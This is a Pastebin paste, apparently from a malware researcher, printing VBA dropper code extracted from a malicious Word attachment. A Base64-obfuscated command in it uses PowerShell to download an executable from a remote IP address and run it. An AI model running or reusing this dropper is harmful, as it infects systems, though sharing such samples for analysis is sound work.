API tools faq
paste
Advertisement
dynamoo

Malicious macro from OLE embedded object

dynamoo
Mar 19th, 2015
672
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 2.48 KB | None | 0 0
raw download clone embed print report
  1. VBA from malicious OLE objected embedded in DOC.
  2. http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
  3. -------------------
  4. Doc_SI2ev??slx.vbsC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev??slx.vbs4C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev??slx.vbshGVhkjbjv = Base64Decode("Y21kIC9LIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1ub3Byb2ZpbGUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovLzkxLjIyNy4xOC43Ni9zbW9venkvc2hha2UuZXhlJywnJVRFTVAlXEpJT2lvZGZoaW9JSC5jYWInKTsgZXhwYW5kICVURU1QJVxKSU9pb2RmaGlvSUguY2FiICVURU1QJVxKSU9pb2RmaGlvSUguZXhlOyBzdGFydCAlVEVNUCVcSklPaW9kZmhpb0lILmV4ZTs=")                   
  5. CreateObject(Base64Decode("V1NjcmlwdC5TaGVsbA==")).Run(""& GVhkjbjv &"")    0              
  6. Function Base64Decode(ByVal base64String)                  
  7.                    
  8.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"                
  9.   Dim dataLength     sOut    groupBegin        
  10.                    
  11.                    
  12.   base64String = Replace(base64String    vbCrLf """)
  13.  base64String = Replace(base64String, vbTab, "")
  14.   base64String = Replace(base64String, "" " """)
  15.  
  16.  dataLength = Len(base64String)
  17.  If dataLength Mod 4 <> 0 Then
  18.     Err.Raise 1, ""Base64Decode"    Bad Base64 string
  19.     Exit Function                  
  20.   End If                   
  21.                    
  22.   For groupBegin = 1 To dataLength Step 4                  
  23.     Dim numDataBytes     CharCounter     thisChar    thisData    nGroup  pOut
  24.     numDataBytes = 3                   
  25.     nGroup = 0                 
  26.                    
  27.     For CharCounter = 0 To 3                   
  28.       thisChar = Mid(base64String    groupBegin + CharCounter    1)        
  29.                    
  30.       If thisChar = "=" Then                   
  31.         numDataBytes = numDataBytes - 1                
  32.         thisData = 0                   
  33.       Else                 
  34.         thisData = InStr(1   Base64  thisChar    vbBinaryCompare) - 1      
  35.       End If                   
  36.       If thisData = -1 Then                
  37.         Err.Raise 2 Base64Decode    Bad character In Base64 string.        
  38.         Exit Function                  
  39.       End If                   
  40.                    
  41.       nGroup = 64 * nGroup + thisData                  
  42.     Next                   
  43.                        
  44.                    
  45.     nGroup = Hex(nGroup)                   
  46.                        
  47.     nGroup = String(6 - Len(nGroup) "0"") & nGroup
  48.    
  49.    pOut = Chr(CByte(""&H"" & Mid(nGroup, 1, 2))) + _
  50.      Chr(CByte(""&H"" & Mid(nGroup, 3, 2))) + _
  51.      Chr(CByte(""&H"" & Mid(nGroup, 5, 2)))
  52.    
  53.  
  54.    sOut = sOut & Left(pOut, numDataBytes)
  55.  Next
  56.  
  57.  Base64Decode = sOut
  58. End Function3C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev.  slx.vbsDoc_SI2ev.  slx.vbsWC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev.  slx.vbs
  59. "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!